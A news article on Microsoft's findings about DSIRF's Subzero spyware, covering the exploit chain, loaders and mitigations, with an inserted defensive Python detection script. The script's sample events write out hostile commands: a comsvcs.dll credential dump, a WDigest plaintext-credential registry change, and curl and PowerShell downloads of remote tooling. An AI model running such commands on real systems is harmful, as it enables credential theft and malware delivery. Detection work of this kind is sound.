Microsoft Denounces Advanced Spyware in Bid to Defuse It
Threat Actor Uses Zero-Days to Deliver 'Subzero' Malware
An alleged Austrian purveyor of advanced spyware uses multiple Microsoft and Adobe zero-days to infect victims' computers, the operating system giant revealed in a bid to neutralize the cyberweapon supplier's hacking tool.
Microsoft fingers Vienna-based DSIRF as the threat actor behind malware known as "Subzero," a spyware application capable of keylogging, exfiltrating files and making remote updates. Known victims include law firms, banks and consultancies in Austria, the United Kingdom and Panama.
The Microsoft Threat Intelligence Center says it tracked cyberespionage activities to DSIRF, which claims to provide "tailored research operations" to corporate clients. Microsoft says it discovered command-and-control infrastructure and a GitHub account associated with the Austrian firm, and that a code-signing certificate issued to DSIRF was used to sign an exploit. DSIRF did not respond to a request for comment. Microsoft bestowed the moniker "Knotweed" on the DSIRF malware.
The researchers' publication comes at a moment of heightened scrutiny of commercial spyware apps with intelligence agency-level capabilities. At least 30 such vendors now exist worldwide - a considerable jump from the handful of just a few years ago. U.S. lawmakers have pledged action against the firms while technology giants Facebook and Apple are suing premier spyware maker NSO Group in federal court (see: Tech Alone Won't Defeat Advanced Spyware, US Congress Told).
The Exploit Chain Used
The attack involves two phases: gaining access to victims' computers using zero-days, then deploying the malware.
Attackers achieve the first phase through a variety of methods that include exploiting zero-day vulnerabilities or malicious Office document macros, a regular go-to method for hackers.
Notable among the exploited zero-days is a recently patched vulnerability that allows attackers to elevate their operating system access, tracked as CVE-2022-22047. Microsoft released the patch weeks ago as part of the company's monthly dump of fixes (see: July Patch Tuesday Fixes 1 Zero-Day, 84 Flaws).
Attackers exploited the vulnerability through a malicious PDF containing code able to escape the Adobe Reader sandbox and write a malicious dynamic link library to disk. The Adobe sandbox's restrictions on writing files did not stop them, since the write itself is permitted and it is only afterward that the attackers hijack a system process to load the malicious DLL. In the Adobe sandbox, "the ability to write out files where the attacker cannot control the path isn't considered dangerous," Microsoft says.
The malware also previously exploited two Windows privilege escalation bugs - CVE-2021-31199 and CVE-2021-31201 - in conjunction with an Adobe Reader bug, CVE-2021-28550, in an exploit chain to deploy Subzero spyware. All these bugs were patched in June 2021 (see: Microsoft Patches 6 Vulnerabilities Currently Under Attack).
Another Windows privilege escalation zero-day, CVE-2021-36948, in the Windows Update Medic Service, allows an attacker to force the service to load an arbitrary signed DLL. "The malicious DLL used in the attacks was signed by 'DSIRF GmbH,'" Microsoft says. Microsoft fixed the bug in August 2021.
The threat actor has also deployed a malicious Excel document disguised as a real estate document containing a malicious macro that was obfuscated by large chunks of text from the Kama Sutra describing the utility of an intermediary to initiate an affair.
Once attackers establish Subzero on a computer, they deploy the primary payloads from a command-and-control server. Microsoft dubs the second-stage software "Corelump" and says it was designed to evade detection by residing exclusively in memory. Corelump ensures persistence by installing Trojanized binaries Microsoft calls "Jumplump," which become responsible for loading Corelump into memory by calling code embedded in a JPEG saved to the computer's temp folder.
One of the JPEGs used by attackers is an image macro of North Korean hereditary Supreme Leader Kim Jong-un holding an acoustic guitar, with the text, "Can I eat this?"
MSTIC also observed several post-compromise actions on victims' systems. These include:
- Setting UseLogonCredential to "1" to enable plaintext credentials;
- Credential dumping via comsvcs.dll;
- Attempting to access emails with dumped credentials from a KNOTWEED IP address;
- Using Curl to download KNOTWEED tooling from public file shares such as vultrobjects[.]com;
- Running PowerShell scripts directly from a GitHub gist created by an account associated with DSIRF.
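A defender-side illustration of the post-compromise actions listed above, added here as an example that is not from Microsoft's report or this article: a handful of detection rules run over constructed Windows telemetry records (the field names and sample values are assumptions, loosely modelled on Sysmon registry-set and process-creation events) to flag the WDigest change, the comsvcs.dll dump, and the curl and PowerShell downloads.

```python
import re

# Constructed sample telemetry (not from the article). Fields are assumptions
# loosely modelled on Sysmon: one registry-set event and four process creations,
# the last of which is a benign control that should not match any rule.
SAMPLE_EVENTS = [
    {"type": "registry_set",
     "key": r"HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential",
     "value": "1"},
    {"type": "process_create", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": "rundll32.exe comsvcs.dll MiniDump <pid> <dumpfile> full"},
    {"type": "process_create", "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe -o C:\\Users\\Public\\tool.bin https://<bucket>.vultrobjects.com/tool.bin"},
    {"type": "process_create", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -Command <script fetched from https://gist.githubusercontent.com/<user>/<id>/raw>"},
    {"type": "process_create", "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe -O https://example.com/index.html"},
]

WDIGEST_KEY = re.compile(r"\\wdigest\\uselogoncredential$", re.I)
GIST_HOST = re.compile(r"gist\.github(usercontent)?\.com", re.I)

def rule_wdigest_plaintext(ev):
    """UseLogonCredential set to 1 re-enables plaintext credentials in memory."""
    return (ev["type"] == "registry_set" and WDIGEST_KEY.search(ev["key"]) is not None
            and ev["value"].strip() == "1")

def rule_comsvcs_dump(ev):
    """comsvcs.dll's MiniDump export invoked from a process command line."""
    c = ev.get("cmdline", "").lower()
    return ev["type"] == "process_create" and "comsvcs.dll" in c and "minidump" in c

def rule_curl_knotweed_host(ev):
    """curl fetching from the public file share named in the report."""
    return (ev["type"] == "process_create" and ev["image"].lower().endswith("\\curl.exe")
            and "vultrobjects.com" in ev.get("cmdline", "").lower())

def rule_powershell_gist(ev):
    """PowerShell pulling a script straight from a GitHub gist."""
    return (ev["type"] == "process_create" and "powershell" in ev["image"].lower()
            and GIST_HOST.search(ev.get("cmdline", "")) is not None)

RULES = {"wdigest_plaintext": rule_wdigest_plaintext, "comsvcs_dump": rule_comsvcs_dump,
         "curl_knotweed_host": rule_curl_knotweed_host, "powershell_gist": rule_powershell_gist}

def scan(events):
    """Return (rule_name, event_index) for every event a rule matches, in event order."""
    return [(name, i) for i, ev in enumerate(events) for name, rule in RULES.items() if rule(ev)]

if __name__ == "__main__":
    for name, i in scan(SAMPLE_EVENTS):
        print(f"[{name}] event {i}: {SAMPLE_EVENTS[i]}")
```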
Based on an analysis of the spyware campaign, Microsoft recommends the following mitigation measures:
- Patch CVE-2022-22047.
- Update Microsoft Defender Antivirus.
- Look out for indicators of compromise on MSTIC's security blog to detect the existence of malware in your environment.
- Change Excel macro security settings to control which macros run and under what circumstances when opening a workbook. Customers can also stop malicious XLM or VBA macros by ensuring runtime macro scanning by Antimalware Scan Interface is on.
- Enable multifactor authentication to mitigate potentially compromised credentials.
- Review all authentication activity for remote access infrastructure, with a particular focus on accounts configured with single-factor authentication, to confirm authenticity and investigate any anomalous activity.